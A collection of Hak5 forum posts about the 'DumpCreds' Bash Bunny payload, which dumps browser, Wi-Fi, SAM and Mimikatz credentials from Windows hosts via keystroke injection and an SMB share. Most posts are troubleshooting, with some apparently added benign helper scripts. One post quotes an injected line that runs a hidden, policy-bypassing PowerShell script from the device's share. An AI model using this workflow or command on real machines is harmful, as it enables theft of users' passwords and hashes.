qdba

Posts posted by qdba

  1. Hello, 

    At the moment I'm writing an extension which gives some debug information during a payload run.

    The function START_DEBUG "tails" /var/log/syslog to /tmp/log.txt (I won't create an extra file because syslog gives a lot more useful information in the background).
    During the payload run I can output some information to syslog with logger.
    With STOP_DEBUG I stop the "tail" and test if /dev/nandf is mounted. If so I copy /tmp/log.txt to /root/disk/loot. If not I mount /dev/nandf to /root/udisk, copy the file, do a sync and unmount /dev/nandf.

    Now the problem. It happens often that when I look in the loot directory there is no log file and the FS is corrupted. This happens even though I do a sync; sleep 1; sync after copying the file and before unmounting the FS.
    It seems that the FS is not unmounted correctly. Sometimes the dirty bit is set.

    Does anybody have an idea?

    payload.txt

    debug.sh
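A more defensive version of the START_DEBUG/STOP_DEBUG idea from this post, written as an added example (it is not qdba's attached debug.sh). It assumes the paths named in the post (/dev/nandf as the flash partition, mounted at /root/udisk, the log in /tmp/log.txt) and adds what the post's description lacks: it reads /proc/mounts to check whether the unmount actually took effect instead of trusting the exit status of umount, retries with a sync in between, lists the processes still holding the mountpoint when it fails, and only unmounts what it mounted itself. The loot sub-directory name is an assumption.

```shell
#!/bin/sh
# Added example, not the debug.sh attached to the post.
# Assumed paths, taken from the post: /dev/nandf is the flash partition and is
# mounted at /root/udisk; the syslog copy is collected in /tmp/log.txt.
DEV=${DEV:-/dev/nandf}
MNT=${MNT:-/root/udisk}
LOOT_SUB=${LOOT_SUB:-loot/debug}     # assumed sub-directory on the flash partition
LOG=${LOG:-/tmp/log.txt}
PIDFILE=/tmp/debug_tail.pid

# Print the mountpoint of device $2 according to the mount table text $1
# (/proc/mounts layout: "<device> <mountpoint> <fstype> <options> 0 0"); print nothing if absent.
mountpoint_of() {
    printf '%s\n' "$1" | awk -v d="$2" '$1 == d { print $2; exit }'
}

# Return 0 if $2 (a device or a mountpoint) occurs in the mount table text $1.
mount_table_has() {
    printf '%s\n' "$1" | awk -v want="$2" \
        '$1 == want || $2 == want { found = 1 } END { exit !found }'
}

# Live check against the kernel's own table rather than trusting umount's exit status.
is_mounted() { mount_table_has "$(cat /proc/mounts)" "$1"; }

# sync, unmount, then verify the mount is really gone; retry because a writer that has
# not finished yet makes umount fail with "device is busy", and a filesystem that is still
# mounted when the Bunny is unplugged is exactly what leaves the dirty bit set.
safe_umount() {
    target=$1; tries=${2:-5}; i=1
    while [ "$i" -le "$tries" ]; do
        sync
        umount "$target" 2>/dev/null
        is_mounted "$target" || return 0
        echo "umount $target: still mounted (try $i/$tries)" >&2
        command -v fuser >/dev/null 2>&1 && fuser -m "$target" >&2   # which PIDs hold it open
        sleep 1
        i=$((i + 1))
    done
    return 1
}

start_debug() {
    : > "$LOG"
    tail -F /var/log/syslog >> "$LOG" 2>&1 &
    echo $! > "$PIDFILE"
    logger "#### START_DEBUG: syslog tail started ####"
}

stop_debug() {
    logger "#### STOP_DEBUG: stopping syslog tail ####"
    if [ -f "$PIDFILE" ]; then
        kill "$(cat "$PIDFILE")" 2>/dev/null
        rm -f "$PIDFILE"
    fi
    sleep 1    # give syslog time to flush the last lines into $LOG before it is copied

    # Reuse an existing mount of the flash partition wherever it is; mount it only if needed.
    dest=$(mountpoint_of "$(cat /proc/mounts)" "$DEV")
    mounted_by_us=0
    if [ -z "$dest" ]; then
        mount "$DEV" "$MNT" || { echo "cannot mount $DEV on $MNT" >&2; return 1; }
        dest=$MNT; mounted_by_us=1
    fi
    mkdir -p "$dest/$LOOT_SUB" && cp "$LOG" "$dest/$LOOT_SUB/log.txt" || echo "copy failed" >&2
    sync
    # Unmount only what this script mounted, and report failure instead of ending silently.
    [ "$mounted_by_us" -eq 0 ] || safe_umount "$dest" || { echo "$DEV left mounted!" >&2; return 1; }
}

case "${1:-}" in
    start) start_debug ;;
    stop)  stop_debug ;;
esac
```

Run it as `debug.sh start` at the top of the payload and `debug.sh stop` at the end; the exit status of `stop` tells the payload whether the flash partition was cleanly released.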

  2. 15 hours ago, b0N3z said:

    Why doesn't it save the loot to the loot directory but instead to the payload folder that it runs from? Is this for a faster payload or to get rid of storage mode during the payload?

    Please go to DEBUG mode (create a file named DEBUG in the payload folder) and look at the file /loot/DumpCred_2.1/log.txt. 
    If there is no log.txt take a look at /tmp/log.txt. If there is something like bunny.service timeout or bunny.service failed you probably ran into a timeout. 

    This is a Bunny issue in Firmware 1.1 and will be solved in FW 1.2.

    Look there .....

  3. Hi,

    copy all the *.json files to the language folder of the bunny flash storage. After that, boot into arming mode. During boot all language files will be copied to an internal folder. I think it was /usr/local/lib/language. (At the moment I have no bunny to look at.)

  4. For Responder you don't need any deb files. Copy the Responder folder from the Tools_Installer payload to <flash_root>\tools and reboot the bunny in arming mode. 
    During reboot the bunny moves the files to /tools ( <root_of_bunny_linux>/tools, previously known as /pentest ).

    You need a deb file only if you have some post- or preinstall scripts running after or before copying the files.

    • Upvote 1
  5. DumpCreds 2.1

    • Author: QDBA
    • Version: Version 2.1.0 Build 1004
    • Target: Windows 10

    Description

    ** !!!!! works only on Bash Bunny with FW 1.1 !!!!! **

    Dumps the usernames & plaintext passwords from

    • Browsers (Chrome, IE, Firefox)
    • Wifi
    • SAM Hashes (only if AdminMode=True)
    • Mimimk@tz Dump (only if AdminMode=True)
    • Computer information (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)

    without

    • Use of USB Storage (because USB storage is mostly blocked by USBGuard or DriveLock)
    • Internet connection (because firewall content filters block the download sites)

    Problems

    • If you use the payload on a computer for the first time, it will take some time and tries until the drivers are successfully loaded.
    • If the payload doesn't work (red LED or yellow LED blinks 2 or 4 times) unplug the BB and try it once more (can take 3 or 4 times).
    • If the payload stops working and the yellow LED blinks very fast for longer than 2 min and you get no white LED, you ran into a timeout. If you plug in the BB every payload has 1min 30s for doing the job. At 1min 30s every payload stops. (That's a FW 1.1 issue.)

    Debug

    If you want some debug information, create a file with the name "DEBUG" in the payload folder. You get the debug information in the file \loot\DumpCred_2.1\log.txt.

    Configuration

    None needed.

    Requirements

    impacket  - install it from https://github.com/qdba/MyBashBunny/tree/master/tools

    Download

    https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

    Install

    1. Put Bash Bunny in arming mode

    2. Copy all folders into the root of the Bunny flash drive.

    Mandatory:
    • payloads/library/DumpCreds_2.1 --> the payload files
    • payloads/library/DumpCreds_2.1/PS --> the PowerShell scripts for the payload
    • tools --> impacket tools (provide the smbserver.py) (not necessary if you have already installed it)

    Not necessary:
    • docs --> this doc file
    • languages --> language files for DUCKY_LANG

    3. Eject Bash Bunny safely!!

    4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )

    5. Put all files and folders of the payload from /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2

    6. Eject Bash Bunny safely

    7. Move the switch to the right position

    8. Plug in Bash Bunny and have fun....! :-)

    STATUS

    LED                      Status
    -----------------------  --------------------------------------------
    Magenta solid            Setup
    Red slow blink           Impacket not found
    Red fast blink           Target did not acquire IP address
    Yellow single blink      Initialization
    Yellow double blink      HID stage
    Yellow triple blink      Wait for IP coming up
    Yellow quad blink        Wait for handshake (SMBServer coming up)
    Yellow very fast blink   PowerShell scripts running
    White fast blink         Cleanup, copy files to /loot
    Green                    Finished

    Discussion

    https://forums.hak5.org/index.php?/topic/40582-payload-drumpcreds-20-wo-internet-wo-usb-storage

    Credits

    to...... 

    https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1

    Changelog

    • Complete new payload.txt code for Bash Bunny 1.1
    • Added a lot of debug code into the payload.
      For debugging create a file "DEBUG" in the payload folder. You get the debug log in \loot\Dumpcreds_2.1
    • Impacket.deb included for easy impacket installation
    • Some Ducky languages included (from the DuckyInstall payload)

  6. Can be a runtime problem. With the default setting a payload does not run longer than 1min 30s (measured since plugging in the bunny).

    After 1min 30s every payload stops working.

    Check your /var/log/syslog if there is an entry like:

    bunny.service start operation timed out. Terminating

    Failed to start bunny.service

  7. I'm still running into the payload timeout after 1 minute.

    So I did some investigation about it.  
    I made the attached payload.txt for testing.
    I put the command logger "#### Start Test payload ####" at the beginning of the payload and
    logger "#### End Test payload ####" at the end. So I can examine in the syslog what happens during the payload run.

    After approx. 1:30 min bunny.service is running into a timeout

    .........
    Apr  6 09:56:52 bunny logger: #### Loop Test payload ####
    Apr  6 09:56:54 bunny logger: #### Loop Test payload ####
    Apr  6 09:56:56 bunny logger: #### Loop Test payload ####
    Apr  6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
    Apr  6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
    Apr  6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
    Apr  6 09:56:58 bunny systemd[1]: Starting Multi-User System.
    Apr  6 09:56:58 bunny systemd[1]: Reached target Multi-User System.
    Apr  6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s.

     

    The result of the command systemctl show bunny.service |grep Timeout is

    TimeoutStartUSec=1min 30s
    TimeoutStopUSec=1min 30s
    JobTimeoutUSec=0
     

    Guess this is the reason for the payload timeout. 
    Can anybody confirm this?

    I will do more investigations.

    syslog

    payload.txt

    ______________________________________________________________________________________________________________________

    OK got it.....

    I inserted the value

    TimeoutSec=5min

    under the [Service] section of the file /lib/systemd/system/bunny.service 
    Now it works with a timeout of 5 min. (see attached syslog.solved_5min_Timeout)

    Be careful, I'm not responsible for any damage to the bunny :-)

    @Darren Kitchen @Sebkinne If you agree (because it's part of the firmware) I can make a payload which will patch this.

    syslog.solved_5min_Timeout
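The fix described above edits the vendor unit file under /lib/systemd/system in place. As an added example (not qdba's payload and not anything shipped with the Bunny firmware), the script below makes the same change through a systemd drop-in under /etc/systemd/system/bunny.service.d/, which leaves the vendor unit untouched and can be reverted by deleting one file. It sets TimeoutStartSec rather than TimeoutSec because the syslog extract shows the *start* operation timing out; TimeoutSec would set both the start and the stop timeout. The unit name and the systemctl query are the ones on the page; the override file name is an assumption.

```shell
#!/bin/sh
# Added example: raise the start timeout of bunny.service with a drop-in
# instead of editing /lib/systemd/system/bunny.service in place.
UNIT=${UNIT:-bunny.service}
DROPIN_DIR=${DROPIN_DIR:-/etc/systemd/system/$UNIT.d}   # standard systemd drop-in location
OVERRIDE=override.conf                                   # assumed file name

# Write the drop-in into directory $1 with start timeout $2 (a systemd time span such
# as 5min or 90s). Rejects values that cannot be a time span so a typo does not
# produce a unit that systemd refuses to load.
write_timeout_override() {
    dir=$1; timeout=$2
    case "$timeout" in
        [0-9]*|infinity) ;;
        *) echo "bad time span: '$timeout'" >&2; return 2 ;;
    esac
    mkdir -p "$dir" || return 1
    # The [Service] header must be repeated in the drop-in; only the keys listed
    # here override the vendor unit, everything else stays as shipped.
    printf '[Service]\nTimeoutStartSec=%s\n' "$timeout" > "$dir/$OVERRIDE"
}

# Print the effective timeouts: the same query as "systemctl show bunny.service | grep Timeout".
show_unit_timeouts() {
    systemctl show "$UNIT" -p TimeoutStartUSec -p TimeoutStopUSec
}

# Write the drop-in, reload the unit definitions, and show the result.
apply_override() {
    write_timeout_override "$DROPIN_DIR" "${1:-5min}" || return $?
    systemctl daemon-reload && show_unit_timeouts
}

case "${1:-}" in
    apply) apply_override "$2" ;;
    show)  show_unit_timeouts ;;
esac
```

After `apply 5min`, `show` should report `TimeoutStartUSec=5min` while `TimeoutStopUSec` keeps its original 1min 30s; removing the drop-in directory and running `systemctl daemon-reload` restores the firmware default.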

  8. There is an error ( or is it a feature ). 

    There is a timeout of approx. 1 min; after this timeout the payload stops.

    Run the attached payload and look at /log.txt 

    The payload stops after a minute

    payload.txt

     

    ------------------------------------[Solved] ------------------------------------------------

    Look there --- look here :-)

  9. 7 minutes ago, Altao said:

    Hi, I use DumpCreds 2.0.2 Build 1003 

    I tried your delay, still the same problem.

    I see -.+.!

    wifi-creds.....

    and the rest

    and at last very shortly a red script part but too short.

    Greetings

    OK, that helps a lot. So the handshake thing works fine.

    Now the error message would be helpful. On very fast vanishing error messages I do a trick. I make a video with the smartphone and step forward slowly by hand until the error message is seen.  

  10. 16 minutes ago, Altao said:

    Hi, can you post a working smbserver.py? I tried nearly everything, a firmware reset, your command; the slow purple blink is still the problem.

    I can connect to \\172.16.64.1\e

    If I run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works

    If I do ps -ef |grep smb

    root       693     1  3 16:00 ?        00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
    root      1393   967  0 16:06 pts/0    00:00:00 grep smb

    and I have a German keyboard

    What's my mistake?

    Greetings

    Are you using Version 2.0.2?
    Is there a UAC prompt or a credential prompt?

    Guess there is a timing problem, so the main.ps1 script will not start. 


    LED R G
    # Wait for Bunny Ethernet and Start main.ps1 Powershell Script
    Q DELAY 500    <<<<<<<<<<<<<<<<<< Increment to 1500 for testing
    Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
    Q DELAY 1000
    Q ENTER

    Does the main.ps1 script fire up right? Can you see the command in the console?

    Take care that no other window is open on the screen. It works best on a pure desktop.

  11. 1 hour ago, Hectortxz said:

    I changed the payload for the US and I pinged my IP to 172.16.64.1 and it came back good. It just doesn't pass the slow purple blink.

    Can you connect to \\172.16.64.1\e from Explorer?

    Is the smbserver.py running ( ssh to the Bunny and do a ps -ef |grep smb )? If not see my post above; there is an error in the Impacket installed by tools_installer.

  12. After a firmware reset this afternoon, I ran into trouble with smbserver.py. It didn't start. The purple LED blinks slowly.

    After some tests I realized that after the run of the tools_installer things were installed fine, but smbserver.py had ^M at the end of every line.
    I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g

    or with the commands

    ------------------------------------------------

    cd /pentest/impacket/examples

    cp smbserver.py smbserver.py.sik

    sed 's/\r$//' smbserver.py.sik > smbserver.py

    -----------------------------------------------------------

    Now it works again.

     
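The fix in this post is a manual sed pass over one file. As an added example (not the tools_installer payload and not impacket's own code), the functions below detect CR line endings in a script, strip them while keeping a backup, and scan a directory so the check can be run over everything the installer copied before smbserver.py is started. It strips only a trailing CR per line, exactly like the sed expression above; the file names in the usage are constructed.

```shell
#!/bin/sh
# Added example: find and strip the CR ("^M") line endings that the post reports
# stopping smbserver.py from running. Not part of the tools_installer payload.

# Return 0 if any line in file $1 ends with a carriage return.
has_crlf() {
    grep -q "$(printf '\r')\$" "$1"
}

# Strip a trailing CR from every line of file $1, keeping the original as $1.bak.
# CRs in the middle of a line are left alone, the same as sed 's/\r$//'.
# Redirecting into the existing file keeps its inode and mode bits.
strip_crlf() {
    f=$1
    [ -f "$f" ] || { echo "no such file: $f" >&2; return 1; }
    cp -p "$f" "$f.bak" || return 1
    awk '{ sub(/\r$/, "") } 1' "$f.bak" > "$f" || return 1
}

# Print every .py and .sh file directly under directory $1 that still has CR line
# endings; return 0 if at least one was found, 1 if the directory is clean.
find_crlf_files() {
    count=0
    for f in "$1"/*.py "$1"/*.sh; do
        [ -f "$f" ] || continue
        if has_crlf "$f"; then
            echo "$f"
            count=$((count + 1))
        fi
    done
    [ "$count" -gt 0 ]
}

# Usage: crlf_check.sh <dir> lists affected files; crlf_check.sh <dir> fix also repairs them.
if [ -n "${1:-}" ]; then
    if [ "${2:-}" = fix ]; then
        for f in $(find_crlf_files "$1"); do strip_crlf "$f" && echo "fixed $f"; done
    else
        find_crlf_files "$1" || echo "no CRLF files in $1"
    fi
fi
```

Running it as `crlf_check.sh /pentest/impacket/examples` after tools_installer lists any files that still carry `^M`; `... fix` repairs them and leaves `.bak` copies next to the originals.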

  13. 3 hours ago, Hectortxz said:

    It's a slow blink. I think it's my IP. I set it to 172.16.64.1 and 255.255.255.0 but it'll turn red when I try the payload, but if my computer tries to automatically get the IP it blinks a slow purple for 5 minutes.

    If you set the IP manually, the var TARGET_IP will not be set by the bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working on an extended version of bunny_helpers.sh. It's not an error of the payload. 

    If the LED blinks slow purple the payload is waiting for smbserver and the handshake. Is a direct connection with Explorer to \\172.16.64.1\e working?

    If yes... does it work when you start the script main.ps1 manually ( enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell )?

    Be sure you have the latest files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.  

  14. 36 minutes ago, illwill said:

    I haven't tested yours but with chromecreds I had an issue with it truncating the URLs with ... if they were too long. This is how I solved it

    Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250

    Thank you for the information. But it didn't work for me, because I start every process in its own PowerShell environment with Start-Job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)

  15. New Version 2.0.2 

    Changelog: 

    • Parallelized the PowerSploit scripts, so the payload is faster.
    • Universal payload. The payload works no matter if there is a UAC prompt or a credentials prompt. There is no kind of exploitation. You will not get admin rights if you didn't have them before. But without admin rights WifiDump, BrowserDump and Computerinformation work fine. Only for Hashdump and M1m1k@tz you need admin rights.

    Install:  

    Copy all files to your switch directory. Don't forget the PS folder. 

    Download: 

    See first post

  16. 15 hours ago, jafahulo said:

    python /pentest/impacket/examples/smbserver.py e $SWITCHDIR &

    Yes, that's the original call of the smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case.

    There are some timing problems in an older payload. I fixed them in a later version. Guess you have an old one. Sorry about it. 

    But anyway, fine that you like the payload. 

    • Upvote 1